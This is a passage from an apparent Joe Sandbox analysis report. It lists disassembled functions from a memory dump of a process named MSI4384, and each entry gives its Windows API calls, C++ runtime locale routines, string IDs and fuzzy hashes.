                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                    • API String ID: 1452528299-1782174991
                                                                    • Opcode ID: 37c6f24ffdbc812963a0c0e36333b34e0fa1ca7b53da3f05e2a932e59d2a2aa6
                                                                    • Instruction ID: 94f8d86dfae82c76bd4dfc9ba906565b0cd0d606efd632ffd7c4c47388e742c4
                                                                    • Opcode Fuzzy Hash: 37c6f24ffdbc812963a0c0e36333b34e0fa1ca7b53da3f05e2a932e59d2a2aa6
                                                                    • Instruction Fuzzy Hash: 4E213D4AB1027286CB705F3D940037AA2F1AF94B55BA6586FD8C8D7390F76D8C8183A9
                                                                    Function 0045D0AE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,0045D268,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?,00000020), ref: 0045D0B1
                                                                    • SetLastError.KERNEL32(00000000,000000FF,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?,00000020), ref: 0045D0CB
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,000000FF,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?), ref: 0045D101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: h!H
                                                                    • API String ID: 1452528299-1293787083
                                                                    • Opcode ID: e5894ddc24941b0a442619e366515a7766f394e4f0811a281b0e2d8ccb694de2
                                                                    • Instruction ID: c5022112db9a93643d59a569fbbd794fa9e27a3fb80d955f5654fcdeec66fd59
                                                                    • Opcode Fuzzy Hash: e5894ddc24941b0a442619e366515a7766f394e4f0811a281b0e2d8ccb694de2
                                                                    • Instruction Fuzzy Hash: EF01D2726082016FD2113771BC8AD2F2659EF417AEB60053FFD05541A7EA9A4C0E865E
                                                                    Function 00437D3A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Maklocchr
                                                                    • String ID:
                                                                    • API String ID: 2020259771-0
                                                                    • Opcode ID: 58a29249a863e2e4a4a37539f0f71cc3ba1c26bb190272e1ea29815b4eaf2c7b
                                                                    • Instruction ID: d14c70653d6d2573c11cb9f6a50c0b1e8798829d7dea785d69c987eea913e61c
                                                                    • Opcode Fuzzy Hash: 58a29249a863e2e4a4a37539f0f71cc3ba1c26bb190272e1ea29815b4eaf2c7b
                                                                    • Instruction Fuzzy Hash: 3E118FF19087447BE3209BA59841F13B7ECBF09754F04551AF189CBA41D368F85087E9
                                                                    Function 00434171 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00434178
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434182
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • numpunct.LIBCPMT ref: 004341BC
                                                                    • std::_Facet_Register.LIBCPMT ref: 004341D3
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004341F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: f115c5e5c67e25ea158f2a5f60a7f7520e7b0a700666ed870f8c97f9a4090e3f
                                                                    • Instruction ID: 8d437f5735990594e910453c295a7a63880faf14f02737c674347807af77e5a8
                                                                    • Opcode Fuzzy Hash: f115c5e5c67e25ea158f2a5f60a7f7520e7b0a700666ed870f8c97f9a4090e3f
                                                                    • Instruction Fuzzy Hash: 0C1102319001199BCF04FFA1D8556BE77A1AF88718F24401FF510A7391DF78AE018B99
                                                                    Function 004453AB Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004453B2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004453BC
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 004453F6
                                                                    • std::_Facet_Register.LIBCPMT ref: 0044540D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0044542D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 6ecf88e30246ad3b2f5a740c23a8a8646b89ab92e720719086dd4a9a7ac75019
                                                                    • Instruction ID: f8f9f08d27f8da5281818c67cb2bfa6a5ca1cdf657af16defbc74a07cc339f53
                                                                    • Opcode Fuzzy Hash: 6ecf88e30246ad3b2f5a740c23a8a8646b89ab92e720719086dd4a9a7ac75019
                                                                    • Instruction Fuzzy Hash: A0010471A005259BDB04FFA5D851AAE7761BF48719F20441EF811AB3D2DFB89E018BC9
                                                                    Function 00445440 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445447
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445451
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0044548B
                                                                    • std::_Facet_Register.LIBCPMT ref: 004454A2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004454C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: e51bd608877d63bd994e5aac4fdfaf4e4b1a5eea0be7aa79bd7318d8a918f1aa
                                                                    • Instruction ID: bfe7a30b6232d5ce80fdb9fa004ab253ef6d4ce5069e0691bb77552dede4c6ff
                                                                    • Opcode Fuzzy Hash: e51bd608877d63bd994e5aac4fdfaf4e4b1a5eea0be7aa79bd7318d8a918f1aa
                                                                    • Instruction Fuzzy Hash: 7D014471A00525EBDF04FFA0D801AAEB770AF84719F10041EE5016B382DF7C9E008BAA
                                                                    Function 00433FB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00433FB9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00433FC3
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • codecvt.LIBCPMT ref: 00433FFD
                                                                    • std::_Facet_Register.LIBCPMT ref: 00434014
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00434034
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                    • String ID:
                                                                    • API String ID: 712880209-0
                                                                    • Opcode ID: 223fa9f0375bb194223df4971539f497deacabf6370652c915f7fe10dfff8c7b
                                                                    • Instruction ID: 40639d1c595dd18077158d2d6f732960e8aebcf3eeba16703c22f12c9066242d
                                                                    • Opcode Fuzzy Hash: 223fa9f0375bb194223df4971539f497deacabf6370652c915f7fe10dfff8c7b
                                                                    • Instruction Fuzzy Hash: B3012B31A001159BCB04FFA5D8556AE7770AF88718F21441FF910AB3D1DF7C9E008B89
                                                                    Function 00426150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004261B5
                                                                    • GetLastError.KERNEL32(?,?,?,000000FF,0046B8CD,000000FF), ref: 0042626B
                                                                      • Part of subcall function 00421FD0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,0046B0ED,000000FF,?,80070057,?,00000000,?,00000010,?,00421B09,?), ref: 0042205C
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,0046B8CD,000000FF), ref: 0042620F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 4113295189-2227199552
                                                                    • Opcode ID: f9492f073c387711961b306724e85f20578249a64bfa6251962d42687feef194
                                                                    • Instruction ID: 6ae90586fa53f911405ab6227d444248164c09aae110fe23e1aea9fe34d25599
                                                                    • Opcode Fuzzy Hash: f9492f073c387711961b306724e85f20578249a64bfa6251962d42687feef194
                                                                    • Instruction Fuzzy Hash: 6F41B371A00219DFDB10DF69DD44BAEB7B4FF04310F54416AE815D72C1E7B89904CB65
                                                                    Function 0044690D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 4281374311-1686923651
                                                                    • Opcode ID: e2346cf69dfeb67103e05149a3e57884c4065fb816b32d1b4ba01566d9fc9487
                                                                    • Instruction ID: 8fe0d7d6e9e7a17b9257f1e72da0ba4f6b5f96ce683b95b7f5deab543835c69e
                                                                    • Opcode Fuzzy Hash: e2346cf69dfeb67103e05149a3e57884c4065fb816b32d1b4ba01566d9fc9487
                                                                    • Instruction Fuzzy Hash: 9A21D0B1800B56AEEB25DF75884076BBBF8AB0D304F04091FE499C7A42D778E605CF95
                                                                    Function 0043DF5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043DF64
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D5A
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D77
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D94
                                                                      • Part of subcall function 00437D3A: _Maklocchr.LIBCPMT ref: 00437DA6
                                                                      • Part of subcall function 00437D3A: _Maklocchr.LIBCPMT ref: 00437DB9
                                                                    • _Mpunct.LIBCPMT ref: 0043DFFC
                                                                    • _Mpunct.LIBCPMT ref: 0043E016
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2939335142-1686923651
                                                                    • Opcode ID: 2033cb136ef1b9d1fce2125b6833441d7ab31aff227ae18f656f45ed3adfa4ed
                                                                    • Instruction ID: 48827fd857e5c4f02e24bdbbd32c2fbd8ae63596ed434d6fbec003aee6e202d4
                                                                    • Opcode Fuzzy Hash: 2033cb136ef1b9d1fce2125b6833441d7ab31aff227ae18f656f45ed3adfa4ed
                                                                    • Instruction Fuzzy Hash: 0121DDB1804B56AEDB25DF759880B6BBBF8AB0C304F04191FE499C7A42D778E605CB94
                                                                    Function 00437E2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _Maklocstr.LIBCPMT ref: 00437E6A
                                                                    • _Maklocstr.LIBCPMT ref: 00437E83
                                                                      • Part of subcall function 00437FB2: Concurrency::cancel_current_task.LIBCPMT ref: 00438054
                                                                    • _Maklocstr.LIBCPMT ref: 00437E92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Concurrency::cancel_current_task
                                                                    • String ID: :AM:am:PM:pm
                                                                    • API String ID: 980645097-1966799564
                                                                    • Opcode ID: ca7f68b948d55045c86837a7496df92683b29a248a139135d95c218cb060526f
                                                                    • Instruction ID: 868fc7ff20bdec782422256ded35c14d290254d0193bbb7292a45ec49c1ee602
                                                                    • Opcode Fuzzy Hash: ca7f68b948d55045c86837a7496df92683b29a248a139135d95c218cb060526f
                                                                    • Instruction Fuzzy Hash: E101ACB2D003047BDB10AFA59C46D9FB7BCEB85714F10441FF405A7141DB78AD058BA4
                                                                    Function 0043A8DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A8E2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A8EC
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A95D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: t:H
                                                                    • API String ID: 1383202999-4044820037
                                                                    • Opcode ID: e356f379ef772c34a64ea6bd2dfacfe92ae40ce72d6c212c6a49a9180107a6c2
                                                                    • Instruction ID: dc0486667268e528a2d65163c91645943a2e13e647dd22f3624d71840cfc9a2b
                                                                    • Opcode Fuzzy Hash: e356f379ef772c34a64ea6bd2dfacfe92ae40ce72d6c212c6a49a9180107a6c2
                                                                    • Instruction Fuzzy Hash: 01F0C27194011A5ADB08FEA1C856BAE2224AF44B18F51481EF550772D2DF3C8A04878A
                                                                    Function 0043A970 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A977
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A981
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A9F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: L:H
                                                                    • API String ID: 1383202999-3681532525
                                                                    • Opcode ID: 37b23e42239986a261a7e2d021482b38204d51dbfddd380f45f2d017927b0b62
                                                                    • Instruction ID: c7aaab55e1cd23e97fba0090b382e0e35d1aaae01a04608edc63b3d1f47129d9
                                                                    • Opcode Fuzzy Hash: 37b23e42239986a261a7e2d021482b38204d51dbfddd380f45f2d017927b0b62
                                                                    • Instruction Fuzzy Hash: CBF0C231940116A7DB08BEA1C852BAE2224AF44B1DF51081EF510772D1EF3C8A04878E
                                                                    Function 0043AA05 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AA0C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AA16
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AA87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: x:H
                                                                    • API String ID: 1383202999-4161664801
                                                                    • Opcode ID: 67db09e4f5dc43d6fa60c729c4d91ca578fdf1c900a2da7831dc8d506f44c8ee
                                                                    • Instruction ID: 734177de5823c01ff57d3b6d302427660ae52e121f1bd707bf559d0cb85f2253
                                                                    • Opcode Fuzzy Hash: 67db09e4f5dc43d6fa60c729c4d91ca578fdf1c900a2da7831dc8d506f44c8ee
                                                                    • Instruction Fuzzy Hash: 84F0F63294011A57CB08FFA1C852AAE2324AF54B18F64441FF550A72C1DF3C8A1487CE
                                                                    Function 0043AA9A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AAA1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AAAB
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AB1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: P:H
                                                                    • API String ID: 1383202999-3461603449
                                                                    • Opcode ID: 999fe1c6b4c9c9b5ee0da3a36e30a10c81902c61912c0d84ca3d5960610ecd91
                                                                    • Instruction ID: 518aae3efd0b884eb07f870a67bf54b15e1973492e396024ca2cbcaf4c29021a
                                                                    • Opcode Fuzzy Hash: 999fe1c6b4c9c9b5ee0da3a36e30a10c81902c61912c0d84ca3d5960610ecd91
                                                                    • Instruction Fuzzy Hash: 9FF0F031A4011A9ACB19FFA1C856BBE7321AF0471CF50441FF6206B2C2DF3C9A1487CA
                                                                    Function 0044DE82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0044DE33,00000000,?,00483F04,?,?,?,0044DFD6,00000004,InitializeCriticalSectionEx,0047230C,InitializeCriticalSectionEx), ref: 0044DE8F
                                                                    • GetLastError.KERNEL32(?,0044DE33,00000000,?,00483F04,?,?,?,0044DFD6,00000004,InitializeCriticalSectionEx,0047230C,InitializeCriticalSectionEx,00000000,?,0044DD8D), ref: 0044DE99
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0044DEC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
